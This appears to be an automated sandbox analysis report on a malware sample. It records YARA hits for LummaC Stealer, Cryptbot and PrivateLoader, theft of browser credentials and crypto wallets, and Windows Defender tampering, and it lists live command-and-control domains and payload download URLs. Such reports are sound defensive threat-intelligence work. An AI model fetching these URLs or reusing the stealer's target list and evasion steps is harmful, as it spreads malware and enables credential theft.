Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe Queries volume information: C:\Windows VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe Queries volume information: C:\Windows\AppReadiness VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_0045892C GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle, 11_2_0045892C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0054100D GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime, 3_2_0054100D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00441F10 GetComputerNameA,__aulldiv,GlobalAlloc,LookupAccountNameA,GetLastError,ConvertSidToStringSidA,GetLastError, 3_2_00441F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0042DB80 RtlGetVersion,GetVersionExA, 3_2_0042DB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1688734412.0000000001107000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected Clipboard Hijacker
Source: Yara match File source: 00000006.00000003.2335001798.0000000003F8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: G__XJZ9ACVwRjgVn6BXId6E1.exe PID: 7876, type: MEMORYSTR
Yara detected Cryptbot
Source: Yara match File source: Process Memory Space: G__XJZ9ACVwRjgVn6BXId6E1.exe PID: 7876, type: MEMORYSTR
Yara detected LummaC Stealer
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Yara detected PrivateLoader
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 7600, type: MEMORYSTR
Yara detected Socks5Systemz
Source: Yara match File source: 0000000D.00000002.2682333164.0000000002CA1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2681681292.0000000002BF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: playglock32x64.exe PID: 8056, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe String found in binary or memory: Electrum
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe String found in binary or memory: \ElectronCash\wallets
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000000.1571265793.00000000013E2000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: \@trezor\Exodus\backupExodus backup\MultiBitHDMultiBit HD\Electrum\wallets\ElectronCash\walletsElectron Cash\Electrum-btcp\walletsElectrum BTCP\walletsUnknown Wallet (Folder - wallets)\Exodus EdenDogecoin
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe String found in binary or memory: Jaxx Liberty
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe String found in binary or memory: \Exodus\backup
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe String found in binary or memory: Exodus\
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe String found in binary or memory: Ethereum (UTC)
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: G__XJZ9ACVwRjgVn6BXId6E1.exe PID: 7876, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Cryptbot
Source: Yara match File source: Process Memory Space: G__XJZ9ACVwRjgVn6BXId6E1.exe PID: 7876, type: MEMORYSTR
Yara detected LummaC Stealer
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Yara detected PrivateLoader
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 7600, type: MEMORYSTR
Yara detected Socks5Systemz
Source: Yara match File source: 0000000D.00000002.2682333164.0000000002CA1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2681681292.0000000002BF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: playglock32x64.exe PID: 8056, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1521590 Sample: file.exe Startdate: 29/09/2024 Architecture: WINDOWS Score: 100 154 iplog.co 2->154 156 ghostreedmnu.shop 2->156 158 5 other IPs or domains 2->158 180 Suricata IDS alerts for network traffic 2->180 182 Found malware configuration 2->182 184 Malicious sample detected (through community Yara rule) 2->184 186 19 other signatures 2->186 15 file.exe 2 2->15         started        19 svchost.exe 2->19         started        signatures3 process4 file5 142 C:\Users\user\AppData\Local\...\file.exe.log, CSV 15->142 dropped 172 Contains functionality to inject code into remote processes 15->172 174 Writes to foreign memory regions 15->174 176 Allocates memory in foreign processes 15->176 178 Injects a PE file into a foreign processes 15->178 21 RegAsm.exe 27 15->21         started        26 conhost.exe 15->26         started        28 WerFault.exe 19->28         started        30 WerFault.exe 19->30         started        32 WerFault.exe 19->32         started        34 3 other processes 19->34 signatures6 process7 dnsIp8 160 ghostreedmnu.shop 188.114.96.3 CLOUDFLARENETUS European Union 21->160 162 api64.ipify.org 173.231.16.77, 443, 49706 WEBNXUS United States 21->162 164 8 other IPs or domains 21->164 134 C:\Users\...\tyq3dazbB0crObgKIDGLxiAO.exe, PE32 21->134 dropped 136 C:\Users\...\hI6pMK6rYY2urO_lpGyU85DA.exe, PE32 21->136 dropped 138 C:\Users\...\Jrh6BLxH1aqS3cJle2sY_F2Q.exe, PE32 21->138 dropped 140 7 other malicious files 21->140 dropped 194 Drops PE files to the document folder of the user 21->194 196 Creates HTML files with .exe extension (expired dropper behavior) 21->196 198 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 21->198 200 Found API chain indicative of sandbox detection 21->200 36 Jrh6BLxH1aqS3cJle2sY_F2Q.exe 7 21->36         started        39 hI6pMK6rYY2urO_lpGyU85DA.exe 2 21->39         started        41 G__XJZ9ACVwRjgVn6BXId6E1.exe 4 21->41         started        45 2 other processes 21->45 file9 signatures10 process11 dnsIp12 118 C:\Users\user\AppData\Local\...\Install.exe, PE32 36->118 dropped 47 Install.exe 4 36->47         started        120 C:\Users\...\hI6pMK6rYY2urO_lpGyU85DA.tmp, PE32 39->120 dropped 50 hI6pMK6rYY2urO_lpGyU85DA.tmp 18 17 39->50         started        166 fivevh5pt.top 84.38.182.221 SELECTELRU Russian Federation 41->166 122 C:\Users\user\AppData\...\service123.exe, PE32 41->122 dropped 124 C:\Users\user\...\IZImiIFXXrvtVOHFozZW.dll, PE32 41->124 dropped 206 Multi AV Scanner detection for dropped file 41->206 208 Found many strings related to Crypto-Wallets (likely being stolen) 41->208 210 Tries to harvest and steal browser information (history, passwords, etc) 41->210 212 Drops large PE files 41->212 126 C:\Users\user\AppData\Local\...\Y-Cleaner.exe, PE32 45->126 dropped 128 C:\Users\user\...\Bunifu_UI_v1.5.3.dll, PE32 45->128 dropped 130 C:\Users\user\AppData\Local\...\soft[1], PE32 45->130 dropped 132 C:\Users\user\AppData\Local\...\dll[1], PE32 45->132 dropped 214 Detected unpacking (changes PE section rights) 45->214 216 Detected unpacking (overwrites its own PE header) 45->216 218 Writes to foreign memory regions 45->218 220 3 other signatures 45->220 52 WerFault.exe 45->52         started        54 WerFault.exe 45->54         started        56 WerFault.exe 45->56         started        58 3 other processes 45->58 file13 signatures14 process15 file16 144 C:\Users\user\AppData\Local\...\Install.exe, PE32 47->144 dropped 60 Install.exe 47->60         started        146 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 50->146 dropped 148 C:\Users\user\AppData\Local\...\_iscrypt.dll, PE32 50->148 dropped 150 C:\Users\user\AppData\Local\...\_RegDLL.tmp, PE32 50->150 dropped 152 16 other files (9 malicious) 50->152 dropped 63 playglock32x64.exe 19 50->63         started        process17 dnsIp18 226 Multi AV Scanner detection for dropped file 60->226 228 Uses schtasks.exe or at.exe to add and modify task schedules 60->228 230 Modifies Windows Defender protection settings 60->230 67 cmd.exe 60->67         started        70 forfiles.exe 60->70         started        72 schtasks.exe 60->72         started        168 ejrsoyz.ua 185.208.158.248 SIMPLECARRER2IT Switzerland 63->168 170 89.105.201.183 NOVOSERVE-ASNL Netherlands 63->170 116 C:\...drax Smart Maker 9.28.47.exe, PE32 63->116 dropped file19 signatures20 process21 signatures22 188 Suspicious powershell command line found 67->188 190 Uses cmd line tools excessively to alter registry or file data 67->190 192 Modifies Windows Defender protection settings 67->192 74 forfiles.exe 67->74         started        77 forfiles.exe 67->77         started        79 forfiles.exe 67->79         started        87 3 other processes 67->87 81 cmd.exe 70->81         started        83 conhost.exe 70->83         started        85 conhost.exe 72->85         started        process23 signatures24 222 Modifies Windows Defender protection settings 74->222 89 cmd.exe 74->89         started        92 cmd.exe 77->92         started        94 cmd.exe 79->94         started        224 Suspicious powershell command line found 81->224 96 powershell.exe 81->96         started        98 cmd.exe 87->98         started        100 cmd.exe 87->100         started        process25 signatures26 202 Uses cmd line tools excessively to alter registry or file data 89->202 102 reg.exe 89->102         started        104 reg.exe 92->104         started        106 reg.exe 94->106         started        108 WMIC.exe 96->108         started        204 Suspicious powershell command line found 98->204 110 powershell.exe 98->110         started        112 reg.exe 100->112         started        process27 process28 114 gpupdate.exe 110->114         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
194.58.114.223
 unknown Russian Federation
197695 AS-REGRU false
80.66.75.114
 unknown Russian Federation
20803 RISS-ASRU false
34.117.59.81
 ipinfo.io United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
103.130.147.211
 unknown Turkey
63859 MYREPUBLIC-AS-IDPTEkaMasRepublikID false
84.38.182.221
 fivevh5pt.top Russian Federation
49505 SELECTELRU true
45.91.200.135
 unknown Netherlands
204601 ON-LINE-DATAServerlocation-NetherlandsDrontenNL false
162.159.130.233
 cdn.discordapp.com United States
13335 CLOUDFLARENETUS false
185.208.158.248
 ejrsoyz.ua Switzerland
34888 SIMPLECARRER2IT true
188.114.96.3
 iplog.co European Union
13335 CLOUDFLARENETUS true
176.113.115.95
 unknown Russian Federation
49505 SELECTELRU false
173.231.16.77
 api64.ipify.org United States
18450 WEBNXUS false
147.45.60.44
 marafon.in Russian Federation
2895 FREE-NET-ASFREEnetEU false
89.105.201.183
 unknown Netherlands
24875 NOVOSERVE-ASNL false

Contacted Domains

Name IP Active
fivevh5pt.top 84.38.182.221 true
iplog.co 188.114.96.3 true
marafon.in 147.45.60.44 true
ipinfo.io 34.117.59.81 true
cdn.discordapp.com 162.159.130.233 true
ghostreedmnu.shop 188.114.96.3 true
ejrsoyz.ua 185.208.158.248 true
api64.ipify.org 173.231.16.77 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://80.66.75.114/files/download false
    		unknown
    http://103.130.147.211/Files/Silencer.exe false
      		unknown
      reinforcenh.shop true
        		unknown
        stogeneratmns.shop true
          		unknown
          ejrsoyz.ua8a true
            		unknown
            ghostreedmnu.shop true
              		unknown
              http://103.130.147.211/Files/CheckTool.exe false
                		unknown
                http://ejrsoyz.ua/search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c444db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf814c6eb959d3e true
                  		unknown
                  http://194.58.114.223/d/385121 false
                    		unknown
                    http://80.66.75.114/dll/key false
                      		unknown
                      01fivevh5pt.top true
                        		unknown
                        https://iplog.co/1S3fd7 true
                          		unknown
                          fragnantbui.shop true
                            		unknown
                            offensivedzvju.shop true
                              		unknown
                              http://ejrsoyz.ua/search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 true
                                		unknown
                                drawzhotdog.shop true
                                  		unknown
                                  http://176.113.115.95/thebig/stories.exe false
                                    		unknown
                                    http://80.66.75.114/add?substr=mixnine&s=three&sub=NOSUB false
                                      		unknown
                                      vozmeatillu.shop true
                                        		unknown
                                        analforeverlovyu.top true
                                        • URL Reputation: safe
                                        		 unknown
                                        https://api64.ipify.org/?format=json false
                                          		unknown
                                          http://80.66.75.114/name false
                                            		unknown
                                            http://103.130.147.211/Files/tac.exe false
                                              		unknown
                                              https://ipinfo.io/widget/demo/8.46.123.33 false
                                                		unknown
                                                http://80.66.75.114/dll/download false
                                                  		unknown